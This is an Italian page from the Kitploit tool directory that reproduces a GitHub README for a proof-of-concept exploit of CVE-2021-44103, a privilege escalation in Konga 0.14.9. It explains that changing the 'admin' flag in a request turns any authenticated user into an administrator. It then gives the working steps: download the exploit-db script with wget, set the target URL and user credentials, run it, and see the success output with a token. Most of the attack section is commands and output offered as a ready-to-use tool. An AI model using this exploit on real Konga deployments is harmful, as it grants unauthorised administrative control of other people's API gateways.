Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-44103 | Kitploit
Strumenti/GitHubGitHub/paulotrindadec/cve-2021-44103
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSicurezza delle API
GitHubpaulotrindadec/cve-2021-44103

CVE-2021-44103

Vedi Repository
33 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-44103

Una prova di concetto per KONGA 0.14.9 - Elevazione dei privilegi.

Introduzione

Il 16 novembre 2021, Fabrício Salomão e io abbiamo trovato una vulnerabilità in Konga API Gateways, che consente a qualsiasi utente autenticato di diventare amministratore.

Segnala la vulnerabilità

Prodotto: KONGA
Modello: 0.14.9
Vulnerabilità: Elevazione dei privilegi
Impatto: accesso completo da amministratore (elevazione verticale dei privilegi)
Autenticazione: richiesta
Autore dell'exploit: Fabricio Salomao / Paulo Trindade

PoC

Di seguito è stato creato un utente normale chiamato "usernormal" senza privilegi.

Crash

Crash

Tramite la richiesta qui sotto, il flag "FALSE" nel parametro "admin" è stato cambiato in "TRUE".

Crash

Per questo è stato creato un exploit per noi: https://www.exploit-db.com/exploits/50521

Crash

Dopo aver eseguito l'exploit, l'elevazione dei privilegi ha avuto successo!

Risultato:

Crash

Esecuzione dell'exploit

root@kitploit:~
wget https://www.exploit-db.com/raw/50521 -O 50521.py

Edit 50521.py

Modify:

urlkonga = "http://www.example.com:1337/" # change to your konga address
identifier = "usernormalkonga"            # change user
password = "changeme"                     # change password

Execute:

python 50521.py

[+] Attack
[+] Token eyJhbGciOiJIUzI1NiJ9.MTA.JFmJ0Vd3z5oeOTokSL0qfPZSOJmnZKEjZVzCJs_AM-U
[+] Change Normal User to Admin
[+] Success

LINK

http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html

https://www.exploit-db.com/exploits/50521

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44103

https://github.com/advisories/GHSA-f2mp-8fgg-7465

https://security.snyk.io/vuln/SNYK-JS-KONGA-2434821

https://twitter.com/CVEnew/status/1508455166885961732

https://twitter.com/search?q=CVE-2021-44103&src=typed_query

Scarica lo strumento